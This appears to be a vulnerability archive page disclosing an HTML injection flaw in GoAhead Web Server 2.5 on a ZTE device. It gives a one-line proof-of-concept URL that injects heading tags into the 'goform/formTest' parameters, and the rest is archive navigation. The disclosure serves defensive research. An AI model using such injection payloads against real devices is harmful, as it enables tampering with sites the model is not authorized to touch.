GoAhead Web Server 2.5 HTML Injection

GoAhead Web Server 2.5 HTML Injection: Posted Feb 2, 2024; Authored by Syed Affan Ahmed; GoAhead Web Server version 2.5 suffers from an html injection vulnerability.; tags | exploit, web; SHA-256 | 24379e92a45cc4550d65aa00b2c98eadf098d5bae864bf1e06214b44e2d34384; Download | Favorite | View

GoAhead Web Server 2.5 HTML Injection

# Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities
# Date: 25/9/2023
# Exploit Author: Syed Affan Ahmed (ZEROXINN)
# Vendor Homepage: https://www.embedthis.com/goahead/
# Affected Version: 2.5 may be others.
# Tested On Version: 2.5 in ZTE AC3630

---------------------------POC---------------------------

GoAhead Web Server Version 2.5 is prone to Multiple HTML-injection vulnerabilities due to inadequate input validation.

HTML Injection can cause the ability to execute within the context of that site.

http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1>

Top Authors In Last 30 Days

Red Hat 292 files
Ubuntu 66 files
Debian 33 files
Gentoo 28 files
LiquidWorm 10 files
nu11secur1ty 7 files
Adam Gowdiak 4 files
kai6u 3 files
liquidsky 3 files
malvuln 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,036)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,495)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,555)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,729)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,487)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

GoAhead Web Server 2.5 HTML Injection

GoAhead Web Server 2.5 HTML Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

GoAhead Web Server 2.5 HTML Injection

Share This

GoAhead Web Server 2.5 HTML Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems